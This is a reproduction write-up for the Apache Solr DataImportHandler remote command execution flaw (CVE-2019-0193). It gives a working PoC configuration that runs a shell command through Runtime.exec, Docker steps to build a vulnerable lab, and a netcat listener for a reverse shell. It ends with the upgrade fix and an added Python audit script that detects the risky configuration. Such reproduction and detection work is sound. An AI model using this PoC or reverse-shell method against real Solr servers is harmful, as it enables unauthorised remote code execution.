
Title: Reproducing the Apache Solr Remote Command Execution Vulnerability


Apache Solr Remote Command Execution Vulnerability

On August 1, 2019, Apache Solr officially released a security advisory for CVE-2019-0193, rating the vulnerability as serious.

The vulnerability is in Apache Solr's DataImportHandler (DIH), an optional but commonly used module for importing data from databases and other sources. The module allows the entire DIH configuration to be supplied through the dataConfig parameter of an external request. Because a DIH configuration can contain scripts, an attacker can achieve remote command execution by sending a crafted request.

360CERT rates the vulnerability as high severity and recommends that Apache Solr users upgrade promptly to prevent exploitation.

POC

    <dataConfig>
      <script><![CDATA[
        function f1(row){
          var run=java.lang.Runtime.getRuntime().exec('touch /tmp/success');
          row.put('name', 'Hello World!');
          return row;
        }
      ]]></script>
      <document>
        <entity name='person' transformer='script:f1' query='select * from person' pk='id'>
          <field column='id' name='id' />
          <field column='name' name='name' />
        </entity>
      </document>
    </dataConfig>

Cause of the vulnerability

The vulnerability requires two conditions:

The user has registered DataImportHandler in the solrconfig.xml file, enabling the DataImport function.

The DataImportHandler module allows its configuration to contain user-supplied scripts.

An attacker can construct a malicious script and hand it to the transformer for execution. Solr does not check this user input while parsing the configuration, so the attacker can execute commands remotely on the Solr server.

Environment setup

Deploying Solr

This environment is deployed with Docker.

Pull the image: docker pull solr:8.1.1

Start the container: docker run --name solr -d -p 8983:8983 -t solr:8.1.1

Visit http://IP:8983/ to confirm that Apache Solr is deployed.


Enabling the DataImportHandler plugin

Create a new core:


Click Add Core; Solr reports an error.

Then execute docker exec -it --user root solr /bin/bash to enter the Solr container.

After entering the container, execute:

    cp -r /opt/solr-8.1.1/server/solr/configsets/_default/conf /var/solr/data/new_core/
    cp /opt/solr/dist/solr-dataimporthandler-8.1.1.jar /opt/solr/server/solr-webapp/webapp/webapp/WEB-INF/lib
    cp /opt/solr/dist/solr-dataimporthandler-extras-8.1.1.jar /opt/solr/server/solr-webapp/webapp/webapp/WEB-INF/lib
    cd /var/solr/data/new_core/conf/
    vim solrconfig.xml

DataImportHandler plugin configuration

Add the following XML to solrconfig.xml:

    <requestHandler name='/dataimport'
        class='org.apache.solr.handler.dataimport.DataImportHandler'>
      <lst name='defaults'>
        <str name='config'>data-config.xml</str>
      </lst>
    </requestHandler>

Note: The XML format must follow the above format, otherwise an error will be reported!

Execute vim data-config.xml and save the following XML to the file:

    <dataConfig>
      <dataSource driver='com.mysql.jdbc.Driver' url='jdbc:mysql://IP:3306/securityTest' user='root' password='root' />
      <document>
        <entity name='person' query='select * from person' pk='id'>
          <field column='id' name='id' />
          <field column='name' name='name' />
        </entity>
      </document>
    </dataConfig>

Then put mysql-connector-java-5.1.48.jar into the /opt/solr/server/solr-webapp/webapp/webapp/WEB-INF/lib folder

Restart Solr

Then restart Solr: /opt/solr/bin/solr restart

At this point, the vulnerable environment has been built.

Vulnerability testing

Access the admin page

Browser access: http://IP:8983/

Enable Debug mode

Copy the PoC into Configuration.

The command executed on the victim machine can be replaced at the marked place. This article uses a reverse shell as an example.

Start a listener

nc -lp 4567

Execute the command

Click Execute with this Configuration


If the execution is successful, the reverse shell connects back to the listener.

Affected versions

Apache Solr < 8.2.0

Remediation

Upgrade Apache Solr to 8.2.0 or later
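
An added example, not part of the original post: a Python audit for the two conditions listed under the cause of the vulnerability. It reports DataImportHandler registrations in a solrconfig.xml and script usage in a DIH configuration, whether that is a data-config.xml on disk or a dataConfig value recovered from a request. The function names and sample XML are constructed for illustration.

```python
import xml.etree.ElementTree as ET

def find_dih_handlers(solrconfig_xml):
    """(handler name, config file) for each DataImportHandler in solrconfig.xml."""
    found = []
    for rh in ET.fromstring(solrconfig_xml).iter("requestHandler"):
        # Matches the full class name and the solr.DataImportHandler shorthand.
        if rh.get("class", "").endswith("DataImportHandler"):
            cfg = rh.find("./lst[@name='defaults']/str[@name='config']")
            found.append((rh.get("name"), cfg.text.strip() if cfg is not None and cfg.text else None))
    return found

def script_findings(data_config_xml):
    """Script usage in a DIH config: a data-config.xml or a captured dataConfig value."""
    # The input may be attacker-supplied, so do not hand DTDs to the XML parser.
    if "<!DOCTYPE" in data_config_xml or "<!ENTITY" in data_config_xml:
        return ["DOCTYPE/ENTITY declaration present; refusing to parse"]
    try:
        root = ET.fromstring(data_config_xml)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for script in root.iter("script"):
        detail = ", calls into Java classes" if "java." in (script.text or "") else ""
        findings.append(f"inline <script> block{detail}")
    for entity in root.iter("entity"):
        for t in entity.get("transformer", "").split(","):
            if t.strip().lower().startswith("script:"):
                findings.append(f"entity '{entity.get('name')}' runs script transformer '{t.strip()[7:]}'")
    return findings

# Constructed samples, modelled on the configuration shown in this post.
SOLRCONFIG = """<config>
  <requestHandler name='/dataimport' class='org.apache.solr.handler.dataimport.DataImportHandler'>
    <lst name='defaults'><str name='config'>data-config.xml</str></lst>
  </requestHandler>
</config>"""
PLAIN = """<dataConfig><document>
  <entity name='person' query='select * from person' pk='id'/>
</document></dataConfig>"""
SCRIPTED = """<dataConfig>
  <script><![CDATA[ function f1(row){ var rt = java.lang.Runtime.getRuntime(); return row; } ]]></script>
  <document>
    <entity name='person' transformer='script:f1' query='select * from person' pk='id'/>
  </document>
</dataConfig>"""

if __name__ == "__main__":
    print(find_dih_handlers(SOLRCONFIG))
    for label, cfg in (("PLAIN", PLAIN), ("SCRIPTED", SCRIPTED)):
        print(label, script_findings(cfg) or "no script usage")
```

A core where find_dih_handlers returns a handler is reachable through the dataConfig parameter on the affected versions, even when the data-config.xml on disk contains no script.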
